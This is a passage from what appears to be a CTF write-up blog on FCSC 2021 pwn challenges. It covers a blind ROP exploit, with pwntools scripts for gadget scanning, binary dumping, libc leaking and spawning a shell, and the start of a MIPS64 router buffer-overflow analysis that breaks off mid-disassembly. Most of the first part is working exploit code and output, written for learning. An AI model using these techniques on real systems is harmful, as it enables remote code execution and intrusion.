    return s.split(b"\x00")[0]

def is_stop(s, ip, padding):
    return (ip not in STOP_GADGETS) and (s == b"Thanks " + padding + unpadd(p64(ip)) + b">>> ") 

def try_jmp(s):
    while True:
        try:
            io = start()
            io.write(s)
            resp = io.recv(500, timeout=30.0)[35:]
            break
        except:
            print(f"STOP: {sys.exc_info()[0]}")
            resp = -1 
            break

    return resp

def find_brop(padding):
    base = 0x400000

    for i in range(0, 0x2000):
        buf = padding + p64(base + i) + p64(0xdeadbeef) * 6 + p64(STOP_GADGETS[0])
        resp = try_jmp(buf)
        if is_stop(resp, base+i, padding):
            print(f"Output: {resp}, leak: {hex(int.from_bytes(p64(base + i), 'little'))}")
            break

        if not i % 35:
            print(f"_ - {hex(i)}")

    return base + i

find_brop("a"*40)

Which returns:

$ ./solve.py
_ - 0x0
_ - 0x23
_ - 0x46
_ - 0x69
_ - 0x8c
_ - 0xaf
_ - 0xd2
_ - 0xf5
_ - 0x118
_ - 0x13b
_ - 0x15e
_ - 0x181
_ - 0x1a4
_ - 0x1c7
_ - 0x1ea
_ - 0x20d
_ - 0x230
_ - 0x253
_ - 0x276
_ - 0x299
_ - 0x2bc
_ - 0x2df
_ - 0x302
_ - 0x325
_ - 0x348
_ - 0x36b
_ - 0x38e
_ - 0x3b1
_ - 0x3d4
_ - 0x3f7
_ - 0x41a
_ - 0x43d
_ - 0x460
_ - 0x483
_ - 0x4a6
_ - 0x4c9
_ - 0x4ec
_ - 0x50f
_ - 0x532
_ - 0x555
_ - 0x578
_ - 0x59b
_ - 0x5be
_ - 0x5e1
_ - 0x604
_ - 0x627
_ - 0x64a
_ - 0x66d
_ - 0x690
_ - 0x6b3
_ - 0x6d6
_ - 0x6f9
_ - 0x71c
Output: b'Thanks aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:\x07@>>> ', leak: 0x40073a

Since we got this gadget we can control rdi and rsi because of some misaligned instructions !

Procedure linkage table (PLT)

The next step would be to leak the PLT to see if there is a puts, printf, or write functions. To find the PLT there is three rules:

The addresses of each stub are 16 bytes aligned
If we jmp one time on a candidate we can check it's a PLT entry by jumping at entry+6 which is the address of the slowpath jump in the GOT. And so the behaviour should be the same.
We can give arguments like valid pointers in rdi and rsi to identify functions like puts, strcmp etc.

I used so a payload's structure like this: padding + POP_RDI + 0x400000 + POP_RSI_R15 + 0x400000 + probe + stop + trap That's how I developped this function:

POP_RDI = CSU_POP+0x9
POP_RSI_R15 = CSU_POP+0x7

def unpadd(s):
    return s.split(b"\x00")[0]

def is_stop(s, ip, padding):
    return (ip not in STOP_GADGETS) and (s == b"Thanks " + padding + unpadd(p64(ip)) + b">>> ") 

def try_jmp(s):
    while True:
        try:
            io = start()
            io.write(s)
            resp = io.recv(500, timeout=30.0)[35:]
            break
        except:
            print(f"STOP: {sys.exc_info()[0]}")
            resp = -1 
            break

    return resp

def find_plt(padding):
    base = 0x400000 
    s = 0 

    for i in range(0x0, 0x3000, 0x10):
        resp1 = try_jmp(padding + p64(POP_RDI) + p64(0x400000) + p64(POP_RSI_R15) + p64(0x400000)*2 + p64(base+i) + p64(STOP_GADGETS[0]) + p64(0xdeadbeef)) # I used the base address because it's an recognizable pattern

        if is_stop(resp1, base+i, padding):
            print(f"Output: {resp1.hex()}, leak: {hex(int.from_bytes(p64(base + i), 'little'))}")

        elif len(resp1):
            print(f"[{hex(base+i)}] Out: {resp1.hex()}")

And we got this:

$ ./solve.py
[0x400500] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307407f454c460201010a3e3e3e20
[0x400510] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307407f454c460201013e3e3e20
[0x400520] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307403e3e3e20
[0x400570] Out: 5468616e6b73204141414141414141414141414141414141414141414141414141414141414141414141414141414143074048656c6c6f20796f752e0a5768617420697320796f7572206e616d65203f0a3e3e3e20
[0x4005d0] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307403e3e3e20
[0x400610] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307403e3e3e20
[0x400630] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307403e3e3e20
[0x400640] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307403e3e3e20
[0x4006e0] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307403e3e3e20
[0x400750] Out: 5468616e6b7320414141414141414141414141414141414141414141414141414141414141414141414141414141414307403e3e3e20

Awesome ! We got a leak of the binary in two gadgets !

Leaking the binary

Since we can leak an arbitrary location it's really easier ! We can see that the patter which leaks is like: Thanks + padding + unpadd(p64(POP_RDI)) + leak_upto_null_byte. So we can leak all the binary from the base address:

STOP_GADGETS = [0x400668]
POP_RDI = CSU_POP+0x9
POP_RSI_R15 = CSU_POP+0x7

def unpadd(s):
    return s.split(b"\x00")[0]

def try_jmp(s):
    while True:
        try:
            io = start()
            io.write(s)
            resp = io.recv(500, timeout=30.0)[35:]
            break
        except:
            print(f"STOP: {sys.exc_info()[0]}")
            resp = -1 
            break

    return resp

def dump_binary(padding, base):
    gadget_leak = 0x400510
    i = 0 
    buf = b""

    pattern = b"Thanks " + padding + unpadd(p64(POP_RDI))

    f = open("leet_dump.bin", "ab")

    while base+i < 0x400fff: # guessed end to the binary .text
        resp1 = try_jmp(padding + p64(POP_RDI) + p64(base+i) + p64(POP_RSI_R15) + p64(0x0)*2 + p64(gadget_leak) + p64(STOP_GADGETS[0]) + p64(0xdeadbeef))

        if not len(resp1): # somtimes there is no repsonse
            continue

        leak = resp1[len(pattern):resp1.index(b'>>> ')] # get the leaked part
        
        if not len(leak): # if no leak it means it's a null byte
            buf += b"\x00"
            print(f"[*] recv @ {hex(base+i)}: 0x00")
            i += 1
        else: # else we got raw data leaked
            buf += leak
            print(f"[*] recv @ {hex(base+i)}: {leak.hex()}")

            i = i + len(leak)

        if len(buf) >= 0x100: # we write bytes to the file each 0x100 bytes
            f.write(buf)
            buf = b""
            print("Buffering ..")

Because of my connection I have to relaunch the script with a different base address to dump the whole binary but anyway, it works !

$ ./solve.py
[skip]
[*] recv @ 0x400fff: 0x00
STOP: <class 'KeyboardInterrupt'>
$ ./solve.py

Since we dumped the binary we just need to build a classic ropchain by leaking the address of FFLUSH in the GOT and then compute the base address of the libc. It's interesting to see that we don't know what libc it is. So we can use this to find from the offset of fflush and read, the right version. Which gives:

__libc_start_main 	0x021a50 	0x0
system 	0x041490 	0x1fa40
fflush 	0x069ab0 	0x48060
open 	0x0db950 	0xb9f00
read 	0x0dbb90 	0xba140
write 	0x0dbbf0 	0xba1a0
str_bin_sh 	0x1633e8 	0x141998

Put everything together

I'll no detail a lot the final part because it's a basic rop payload. But since we got the right gadgets from the leaked binary, it's very easy. We have to notice that this exploit is not 100% reiable, if the address of FFLUSH in the GOT has a NULL byte the exploit will not work. Here is the final function:

STOP_GADGETS = [0x400668]

CSU_POP = 0x40073a
POP_RDI = CSU_POP+0x9
POP_RSI_R15 = CSU_POP+0x7

GADGET_LEAK = 0x400510
FFLUSH_GOT = 0x400000 + 0x200FF0
FFLUSH_OFFSET = 0x069ab0
OFFT_BINSH = 0x1633e8

SYSTEM = 0x041490

def try_jmp_flow(s):
    while True:
        try:
            io = start()
            io.write(s)
            resp = io.recv(500, timeout=30.0)[35:]
            break
        except:
            print(f"STOP: {sys.exc_info()[0]}")
            resp = -1 
            break

    return resp, io

def flow(padding):
    payload = padding
    payload += p64(POP_RDI)
    payload += p64(FFLUSH_GOT)
    payload += p64(POP_RSI_R15) + p64(0xffffffffffffffff)*2
    payload += p64(GADGET_LEAK)
    payload += p64(0x400000 + 0x656) # ret2main

    pattern = b"Thanks " + padding + unpadd(p64(POP_RDI))
    resp_tmp, io = try_jmp_flow(payload)
    print(resp_tmp)
    leak_fflush = int.from_bytes(resp_tmp[len(pattern):resp_tmp.index(b'What is')], 'little')

    libc = leak_fflush - FFLUSH_OFFSET 
    print(f"libc @ {hex(libc)}")

    payload = padding
    payload += p64(POP_RDI)
    payload += p64(libc + OFFT_BINSH)
    payload += p64(libc + SYSTEM)

    io.send(payload)
    io.interactive()

flow("a"*40)

And when we run it, we got a shell yeeeeeah !

$ ./solve.py
b'Thanks AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC\x07@\xb0J\xa2\xd7<\x7fWhat is your name ?\n>>> '
libc @ 0x7f3cd79bb000
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ cat flag
FCSC{3bf7861167a72f521dd70f704d471bf2be7586b635b40d3e5d50b989dc010f28}

Here is the final script:

#!/usr/bin/python3
from pwn import *

STOP_GADGETS = [0x400668]

CSU_POP = 0x40073a
POP_RDI = CSU_POP+0x9
POP_RSI_R15 = CSU_POP+0x7

GADGET_LEAK = 0x400510
FFLUSH_GOT = 0x400000 + 0x200FF0
FFLUSH_OFFSET = 0x069ab0
OFFT_BINSH = 0x1633e8

SYSTEM = 0x041490 

"""
__libc_start_main 	0x021a50 	0x0
system 	0x041490 	0x1fa40
fflush 	0x069ab0 	0x48060
open 	0x0db950 	0xb9f00
read 	0x0dbb90 	0xba140
write 	0x0dbbf0 	0xba1a0
str_bin_sh 	0x1633e8 	0x141998
"""

context.log_level = 'error'

def start():
    return remote("challenges2.france-cybersecurity-challenge.fr", 4008)

def padd(s):
    return s + b"\x00"*(8-(len(s) % 8))

def unpadd(s):
    return s.split(b"\x00")[0]

def is_crash(s):
    return not (len(s) == 0)

def is_stop(s, ip, padding):
    return (ip not in STOP_GADGETS) and (s == b"Thanks " + padding + unpadd(p64(ip)) + b">>> ")

def jmp(av):
    io = start()
    io.write(av)
    return io.recvall(timeout=5.0)

def find_padding(p=b""):
    padding = p + b"\x90"
    print(f"[*] sending: {padding}")
    resp = jmp(padding)
    print(f"[*] recv: {resp}")
    while b"Hello you.\nWhat is your name ?\n>>> Thanks " + padding in resp:
        return find_padding(p=padding)
    return padding[:len(padding)-1] # minus one char because we do not want that padding overwrite the return address

def leak2(padding: str, leak1=b""):
    for i in range(256):
        buf = padding + leak1 + p8(i)
        resp = try_jmp(buf)
        # print(f"Trying on {hex(int.from_bytes(leak1+p8(i), 'little') << (64 - counter*8))}")
        if len(resp):
            print(f"[{hex(int.from_bytes(padd(leak1+p8(i)), 'little'))}] Output: {resp}")
            if len(leak1) < 8:
                leak2(padding, leak1=leak1+p8(i))
            else:
                return leak1

    return leak1

def leak2_opti(padding: str):
    base = 0x400000

    for i in range(0x2000):
        buf = padding + p64(base+i)
        resp = try_jmp(buf)
        # print(f"Trying on {hex(int.from_bytes(leak1+p8(i), 'little') << (64 - counter*8))}")
        if len(resp):
            print(f"[{hex(base+i)}] Output: {resp}")
            continue

    return leak1

def find_brop(padding):
    base = 0x400000

    for i in range(0, 0x2000):
        buf = padding + p64(base + i) + p64(0xdeadbeef) * 6 + p64(STOP_GADGETS[0])
        resp = try_jmp(buf)
        if is_stop(resp, base+i, padding):
            print(f"Output: {resp}, leak: {hex(int.from_bytes(p64(base + i), 'little'))}")
            break

        if not i % 35:
            print(f"_ - {hex(i)}")

    return base + i

def dump_binary(padding, base):
    gadget_leak = 0x400510
    i = 0 
    buf = b""

    pattern = b"Thanks " + padding + unpadd(p64(POP_RDI))

    f = open("leet_dump.bin", "ab")

    while base+i < 0x400fff:
        resp1 = try_jmp(padding + p64(POP_RDI) + p64(base+i) + p64(POP_RSI_R15) + p64(0x0)*2 + p64(gadget_leak) + p64(STOP_GADGETS[0]) + p64(0xdeadbeef))

        if not len(resp1):
            continue

        leak = resp1[len(pattern):resp1.index(b'>>> ')]
        
        if not len(leak):
            buf += b"\x00"
            print(f"[*] recv @ {hex(base+i)}: 0x00")
            i += 1
        else:
            buf += leak
            print(f"[*] recv @ {hex(base+i)}: {leak.hex()}")

            i = i + len(leak)
        
        if len(buf) >= 0x100:
            f.write(buf)
            buf = b""
            print("Buffering ..")

def find_plt(padding):
    base = 0x400000 
    s = 0 

    for i in range(0x0, 0x3000, 0x10):
        resp1 = try_jmp(padding + p64(POP_RDI) + p64(0x400000) + p64(POP_RSI_R15) + p64(0x400000)*2 + p64(base+i) + p64(STOP_GADGETS[0]) + p64(0xdeadbeef)) 

        if is_stop(resp1, base+i, padding):
            print(f"Output: {resp1.hex()}, leak: {hex(int.from_bytes(p64(base + i), 'little'))}")

        elif len(resp1):
            print(f"[{hex(base+i)}] Out: {resp1.hex()}")

def try_jmp(s):
    while True:
        try:
            io = start()
            io.write(s)
            resp = io.recv(500, timeout=30.0)[35:]
            break
        except:
            print(f"STOP: {sys.exc_info()[0]}")
            resp = -1 
            break

    return resp

def try_jmp_flow(s):
    while True:
        try:
            io = start()
            io.write(s)
            resp = io.recv(500, timeout=30.0)[35:]
            break
        except:
            print(f"STOP: {sys.exc_info()[0]}")
            resp = -1 
            break

    return resp, io

def flow(padding):
    payload = av
    payload += p64(POP_RDI)
    payload += p64(FFLUSH_GOT)
    payload += p64(POP_RSI_R15) + p64(0xffffffffffffffff)*2
    payload += p64(GADGET_LEAK)
    payload += p64(0x400000 + 0x656) # ret2main

    pattern = b"Thanks " + padding + unpadd(p64(POP_RDI))
    resp_tmp, io = try_jmp_flow(payload)
    print(resp_tmp)
    leak_fflush = int.from_bytes(resp_tmp[len(pattern):resp_tmp.index(b'What is')], 'little')

    libc = leak_fflush - FFLUSH_OFFSET 
    print(f"libc @ {hex(libc)}")

    payload = av
    payload += p64(POP_RDI)
    payload += p64(libc + OFFT_BINSH)
    payload += p64(libc + SYSTEM)

    io.send(payload)
    io.interactive()

flow("a"*40)
# FCSC{3bf7861167a72f521dd70f704d471bf2be7586b635b40d3e5d50b989dc010f28}

Thanks to the creator of this very interesting challenge !

[FCSC 2021 - pwn] Itsy Mipsy router

Mon, 03 May 2021 00:00:00 GMT

Itsy Mipsy Router (200 pts)

Itsy Mipsy Router is a pwn challenge I did during the FCSC event. It's not a very hard challenge but I found it very interesting because it was my first mips pwn challenge !

Setup

So basically we got this:

On vous demander d'auditer un routeur à l'interface entre Internet et un réseau interne d'une entreprise. Le client vous demande si il est possible de lire les fichiers stockés sur la machine filer qui sert de serveur de fichiers HTTP. nc challenges2.france-cybersecurity-challenge.fr 4005

And for debugging purposes administrators provided a Docker file:

FROM debian:buster-slim
RUN apt update
RUN apt install -yq socat qemu-user libc6-mips64-cross
RUN apt clean
RUN rm -rf /var/lib/apt/lists/

WORKDIR /app
COPY ./mipsy ./
RUN rm /etc/ld.so.cache

EXPOSE 4000
EXPOSE 1234
CMD socat tcp-listen:4000,reuseaddr,fork exec:"qemu-mips64 -L /usr/mips64-linux-gnuabi64 ./mipsy"

So because it's not very convenient to debug it from the docker I tried to run it directly on my host with a gdb stub on port 5445. I setup my host by installing the right packages, deleting /etc/ld.so.cache and by the socat command on port 4000:

$ uname -a
Linux off 5.8.0-50-generic #56~20.04.1-Ubuntu SMP Mon Apr 12 21:46:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
$ sudo apt install socat qemu-user libc6-mips64-cross
Lecture des listes de paquets... Fait
Construction de l'arbre des dépendances       
Lecture des informations d'état... Fait
socat est déjà la version la plus récente (1.7.3.3-2).
libc6-mips64-cross est déjà la version la plus récente (2.30-0ubuntu2cross2).
qemu-user est déjà la version la plus récente (1:4.2-3ubuntu6.15).
0 mis à jour, 0 nouvellement installés, 0 à enlever et 17 non mis à jour.
$ sudo rm -f /etc/ld.so.cache
$ socat tcp-listen:4000,reuseaddr,fork exec:"qemu-mips64 -L /usr/mips64-linux-gnuabi64 -g 5445 ./mipsy"

We can debug the running process with gdb-multiarch (with the path of my pwndbg's gdbinit to get an cleaner output).

$ gdb-multiarch -ex 'source /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/Downloads/pwndbg/gdbinit.py' -q ./mipsy
Reading symbols from ./mipsy...
(No debugging symbols found in ./mipsy)
pwndbg: loaded 196 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
pwndbg> target remote localhost:5445

To send the payload I used pwntools.

from pwn import *

def start():
    # return remote("challenges2.france-cybersecurity-challenge.fr", 4005)
    return remote("localhost", 4000)

io = start()
print(io.recvuntil("] ").decode('utf-8'))

Now we launch the python script to trigger the socat:

$ python3 wu.py                                                               
[+] Opening connection to localhost on port 4000: Done

It does not return anything because it breaks in the shared libraries I guess, so now we can continue the execution in gdb:

Remote debugging using localhost:5445
warning: Unable to find dynamic linker breakpoint function.
GDB will be unable to debug shared library initializers
and track explicitly loaded dynamic code.
0x00000040008038d0 in ?? ()
Could not check ASLR: Couldn't get personality
Downloading '/media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy' from the remote server: OK
add-symbol-file /tmp/tmpsjb8mqsa/mipsy 0x120000000 -s .MIPS.abiflags 0x2400002e0 -s .MIPS.options 0x2400002f8 -s .note.gnu.build-id 0x240000870 -s .dynamic 0x240000898 -s .hash 0x240000aa8 -s .dynsym 0x240001190 -s .dynstr 0x240002858 -s .gnu.version 0x240003b12 -s .gnu.version_r 0x240003cf8 -s .rel.dyn 0x240003d38 -s .init 0x240003d58 -s .text 0x240003de0 -s .MIPS.stubs 0x2400257a0 -s .fini 0x2400259c0 -s .rodata 0x240025a10 -s .interp 0x24002d280 -s .eh_frame_hdr 0x24002d290 -s .eh_frame 0x24002d2a8 -s .note.ABI-tag 0x24002d2e0 -s .ctors 0x24003df58 -s .dtors 0x24003df68 -s .data.rel.ro 0x24003df78 -s .data 0x240040000 -s .rld_map 0x240040020 -s .got 0x240040030 -s .sdata 0x240040840 -s .bss 0x240040850
'context': Print out the current register, instruction, and stack context.
Exception occurred: context: unsupported operand type(s) for +: 'NoneType' and 'int' (<class 'TypeError'>)
For more info invoke `set exception-verbose on` and rerun the command
or debug it by yourself with `set exception-debugger on`
pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
       0x120000000        0x12002e000 r-xp    2e000 0      /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy
       0x12002e000        0x12003d000 ---p     f000 2d000  /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy
       0x12003d000        0x120040000 r--p     3000 2d000  /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy
       0x120040000        0x120043000 rw-p     3000 30000  /media/nasm/7044d811-e1cd-4997-97d5-c08072ce9497/ctf/fcsc/pwn/mipsy/mipsy
      0x4000403000       0x4000828000 r--p   425000 0      <explored>
      0x40007fe000       0x4000801000 rw-p     3000 0      [stack]

[QEMU target detected - vmmap result might not be accurate; see `help vmmap`]
pwndbg> continue
Continuing.
warning: Could not load shared library symbols for 2 libraries, e.g. /lib/libc.so.6.
Use the "info sharedlibrary" command to see the complete listing.
Do you need "set solib-search-path" or "set sysroot"?
[Inferior 1 (process 1) exited normally]

The process exited because we didn't inserted any breakpoints and so our python script outs this:

+---------------------------------+
|/                               \|
|        ITSY MIPSY ROUTER        |
|\                               /|
+---------------------------------+

Menu:
  0. Quit.
  1. Show network interfaces
  2. Ping internal HTTP file server
  3. Log in as admin

[guest@mipsy]

We're able to debug properly our process !

Reverse Engineering

We can take a look at the binary by running the file command:

$ file mipsy                                                                  
mipsy: ELF 64-bit MSB executable, MIPS, MIPS64 rel2 version 1 (SYSV), dynamically linked, interpreter /lib64/ld.so.1, BuildID[sha1]=e20cf7872e96482095ce68e6d4d03806d5928de4, for GNU/Linux 3.2.0, not stripped

So it's a mips64 big endian binary dynamically linked. As we see above, the program is asking for an input among 4 options: Quit, Show network interfaces, Ping internal HTTP file server and Login as admin. We can test these options remotely:

+---------------------------------+
|/                               \|
|        ITSY MIPSY ROUTER        |
|\                               /|
+---------------------------------+

Menu:
  0. Quit.
  1. Show network interfaces
  2. Ping internal HTTP file server
  3. Log in as admin

[guest@mipsy] $ 1
The router has the following network interfaces:
* lo
* eth0
* eth2
* eth1

Menu:
  0. Quit.
  1. Show network interfaces
  2. Ping internal HTTP file server
  3. Log in as admin

[guest@mipsy] $ 2
Success: HTTP file server is up!

Menu:
  0. Quit.
  1. Show network interfaces
  2. Ping internal HTTP file server
  3. Log in as admin

[guest@mipsy] $ 3
Input your password:
>>> l3eT_p4sS
Error: wrong password.

Menu:
  0. Quit.
  1. Show network interfaces
  2. Ping internal HTTP file server
  3. Log in as admin

[guest@mipsy] $ 0

It doesn't give any interesting informations so instead of fuzzing manually the binary to find the vulnerability, I reversed the main functions in IDA. And particulary the code of the the function corresponding to the "Login as admin" feature. The assembly code of this function looks like such:

.globl authenticate
authenticate:

var_40= -0x40
var_18= -0x18
var_10= -0x10
ret_addr= -8

daddiu  $sp, -0x90       ; Doubleword Add Immediate Unsigned
sd      $ra, 0x90+ret_addr($sp)  ; Store Doubleword
sd      $fp, 0x90+var_10($sp)  ; Store Doubleword
sd      $gp, 0x90+var_18($sp)  ; Store Doubleword
move    $fp, $sp
lui     $gp, 4           ; Load Upper Immediate
daddu   $gp, $t9         ; Doubleword Add Unsigned
daddiu  $gp, 0x3AA4      ; Doubleword Add Immediate Unsigned
dli     $v0, 0x120020000  ; Doubleword Load Immediate
daddiu  $a0, $v0, (aInputYourPassw - 0x120020000)  ; "Input your password:"
dla     $v0, puts        ; Load 64-bit address
move    $t9, $v0
jalr    $t9 ; puts       ; Jump And Link Register
nop
dli     $v0, 0x120020000  ; Doubleword Load Immediate
daddiu  $a0, $v0, (asc_120025B00 - 0x120020000)  ; ">>> "
dla     $v0, printf      ; Load 64-bit address
move    $t9, $v0
jalr    $t9 ; printf     ; Jump And Link Register
nop
dla     $v0, stdout      ; Load 64-bit address
ld      $v0, (stdout - 0x120042BC8)($v0)  ; Load Doubleword
move    $a0, $v0         ; stream
dla     $v0, fflush      ; Load 64-bit address
move    $t9, $v0
jalr    $t9 ; fflush     ; Jump And Link Register
nop
move    $a0, $fp
dla     $v0, gets        ; Load 64-bit address
move    $t9, $v0
jalr    $t9 ; gets       ; Jump And Link Register
nop
daddiu  $v0, $fp, 0x50   ; Doubleword Add Immediate Unsigned
li      $a2, 0x20  ; ' '  ; n
move    $a1, $zero       ; c
move    $a0, $v0         ; s
dla     $v0, memset      ; Load 64-bit address
move    $t9, $v0
jalr    $t9 ; memset     ; Jump And Link Register
nop
move    $a0, $fp         ; s
dla     $v0, strlen      ; Load 64-bit address
move    $t9, $v0
jalr    $t9 ; strlen     ; Jump And Link Register
nop
daddiu  $v1, $fp, 0x50   ; Doubleword Add Immediate Unsigned
move    $a2, $v1
move    $a1, $v0
move    $a0, $fp
dla     $v0, kdf         ; Load 64-bit address
move    $t9, $v0
bal     kdf              ; Branch Always and Link
nop
daddiu  $v1, $fp, 0x50   ; Doubleword Add Immediate Unsigned
li      $a2, 0x20  ; ' '  ; n
dli     $v0, 0x120020000  ; Doubleword Load Immediate
daddiu  $a1, $v0, (unk_120025B08 - 0x120020000)  ; s2
move    $a0, $v1         ; s1
dla     $v0, memcmp      ; Load 64-bit address
move    $t9, $v0
jalr    $t9 ; memcmp     ; Jump And Link Register
nop
bnez    $v0, loc_120004688  ; Branch on Not Zero

When I began this challenge I didn't know anything about mips64 assembly but thanks to auto comments in IDA and to this and this, I understood very quickly the main components of the architecture. And that's why I noticed a call to the gets function which as it's known read an arbitrary number of bytes from stdin to the buffer indicated in argument, and so in our case in $fp, which is initialized to $sp-0x90. Next the call to gets, printf and fflush, it calls memset to set every bytes of another buffer allocated next to our input to zero. Then it computes the length of our input and calls the kdf function with the following arguments: kdf(char *input_password, int input_length, unsigned char *out). The kdf function is basically doing some encryption operations according to our input and its length and stores the result in the third argument. And the result of this encryption routine is compared to a constant value with memcmp.

So we discovered the stack based buffer overflow which allows us to overwrite the saved instruction pointer saved at the functions's prologue.

Exploitation

Since we understood the vulnerable function, we can represent the stackframe like that:

$saved_fp-0x90+----------------------+
              |                      |
              |                      |
              |   buffer_password    |
              |                      |
              |                      |
$saved_fp-0x40+----------------------+
              |                      |
              |                      |
              |         out          |
              |                      |
$saved_fp-0x16+----------------------+
              |       saved_gp       |
$saved_fp-0x10+----------------------+
              |       saved_fp       |
   $saved_fp-8+----------------------+
              |       saved_ra       |
     $saved_fp+----------------------+
              |                      |
              |  calling function's  |
              |      stackframe      |
              |                      |
              |                      |
              +----------------------+

And so, according to this schema, we overwrite the saved $ra from a padding of 0x90-0x8=0x88 bytes. But since we're able to jmp everywhere, we have to figure out what kind of technique we want to use.

One gadget ?

For an obsure reason, I thought the gets function had for badchar the NULL byte, so I was looking for a one gadget in the binary. I discovered during the reverse engineering part an interesting snippet of code:

.text:0000000120003FC0                 .globl ip
.text:0000000120003FC0 ip:                                      ; CODE XREF: main+260↓p
.text:0000000120003FC0                                          ; DATA XREF: LOAD:0000000120002438↑o ...
.text:0000000120003FC0
.text:0000000120003FC0 ret             = -0x1050
.text:0000000120003FC0 n_read          = -0x104C 
.text:0000000120003FC0 fd              = -0x1048
.text:0000000120003FC0 var_1044        = -0x1044
.text:0000000120003FC0 buf             = -0x1040
.text:0000000120003FC0 ptr_binsh       = -0x40
.text:0000000120003FC0 dash_c          = -0x38
.text:0000000120003FC0 var_30          = -0x30
.text:0000000120003FC0 null            = -0x28
.text:0000000120003FC0 var_18          = -0x18
.text:0000000120003FC0 var_10          = -0x10
.text:0000000120003FC0 var_8           = -8
.text:0000000120003FC0
.text:0000000120003FC0                 daddiu  $sp, -0x1050     ; Doubleword Add Immediate Unsigned
.text:0000000120003FC4                 sd      $ra, 0x1050+var_8($sp)  ; Store Doubleword
.text:0000000120003FC8                 sd      $fp, 0x1050+var_10($sp)  ; Store Doubleword
.text:0000000120003FCC                 sd      $gp, 0x1050+var_18($sp)  ; Store Doubleword
.text:0000000120003FD0                 move    $fp, $sp         ; prologue
.text:0000000120003FD4                 lui     $gp, 4           ; Load Upper Immediate
.text:0000000120003FD8                 daddu   $gp, $t9         ; Doubleword Add Unsigned
.text:0000000120003FDC                 daddiu  $gp, 0x4060      ; Doubleword Add Immediate Unsigned
.text:0000000120003FE0                 dli     $v0, 0x120020000  ; Doubleword Load Immediate
.text:0000000120003FE4                 daddiu  $v0, (aBinSh - 0x120020000)  ; "/bin/sh"
.text:0000000120003FE8                 sd      $v0, 0x1010($fp)  ; Store Doubleword
.text:0000000120003FEC                 dli     $v0, 0x120020000  ; Doubleword Load Immediate
.text:0000000120003FF0                 daddiu  $v0, (aC - 0x120020000)  ; "-c"
.text:0000000120003FF4                 sd      $v0, 0x1018($fp)  ; Store Doubleword
.text:0000000120003FF8                 dli     $v0, 0x120020000  ; Doubleword Load Immediate
.text:0000000120003FFC                 daddiu  $v0, (aListInterfaces - 0x120020000)  ; "./list_interfaces.sh"
.text:0000000120004000                 sd      $v0, 0x1020($fp)  ; Store Doubleword
.text:0000000120004004                 sd      $zero, 0x1028($fp)  ; Store Doubleword
.text:0000000120004008                 daddiu  $v0, $fp, 8      ; Doubleword Add Immediate Unsigned
.text:000000012000400C                 move    $a0, $v0         ; pipedes
.text:0000000120004010                 dla     $v0, pipe        ; Load 64-bit address
.text:0000000120004014                 move    $t9, $v0         ; pipe
.text:0000000120004018                 jalr    $t9 ; pipe       ; Jump And Link Register
.text:000000012000401C                 nop                      ; nop
.text:0000000120004020                 move    $v1, $v0         ; return value
.text:0000000120004024                 dli     $v0, 0xFFFFFFFFFFFFFFFF  ; Doubleword Load Immediate
.text:0000000120004028                 bne     $v1, $v0, loc_120004070  ; Branch on Not Equal
; skip
.text:0000000120004070 loc_120004070:                           ; CODE XREF: ip+68↑j
.text:0000000120004070                 dla     $v0, fork        ; Load 64-bit address
.text:0000000120004074                 move    $t9, $v0         ; fork
.text:0000000120004078                 jalr    $t9 ; fork       ; Jump And Link Register
.text:000000012000407C                 nop                      ; nop
.text:0000000120004080                 sw      $v0, 0($fp)      ; Store Word
.text:0000000120004084                 lw      $v1, 0($fp)      ; Load Word
.text:0000000120004088                 dli     $v0, -1          ; Doubleword Load Immediate
.text:000000012000408C                 bne     $v1, $v0, loc_1200040D4  ; Branch on Not Equal
; skip
.text:00000001200040D4 loc_1200040D4:                           ; CODE XREF: ip+CC↑j
.text:00000001200040D4                 lw      $v0, 0($fp)      ; Load Word
.text:00000001200040D8                 bnez    $v0, loc_120004158  ; Branch on Not Zero
.text:00000001200040DC                 nop                      ; nop
.text:00000001200040E0                 lw      $v0, 0xC($fp)    ; Load Word
.text:00000001200040E4                 li      $a1, 1           ; fd2
.text:00000001200040E8                 move    $a0, $v0         ; fd
.text:00000001200040EC                 dla     $v0, dup2        ; Load 64-bit address
.text:00000001200040F0                 move    $t9, $v0         ; dup2
.text:00000001200040F4                 jalr    $t9 ; dup2       ; Jump And Link Register
.text:00000001200040F8                 nop                      ; nop
.text:00000001200040FC                 lw      $v0, 8($fp)      ; Load Word
.text:0000000120004100                 move    $a0, $v0         ; fd
.text:0000000120004104                 dla     $v0, close       ; Load 64-bit address
.text:0000000120004108                 move    $t9, $v0         ; close
.text:000000012000410C                 jalr    $t9 ; close      ; Jump And Link Register
.text:0000000120004110                 nop                      ; nop
.text:0000000120004114                 lw      $v0, 0xC($fp)    ; Load Word
.text:0000000120004118                 move    $a0, $v0         ; fd
.text:000000012000411C                 dla     $v0, close       ; Load 64-bit address
.text:0000000120004120                 move    $t9, $v0         ; close
.text:0000000120004124                 jalr    $t9 ; close      ; Jump And Link Register
.text:0000000120004128                 nop                      ; nop
.text:000000012000412C                 ld      $v0, 0x1010($fp)  ; Load Doubleword
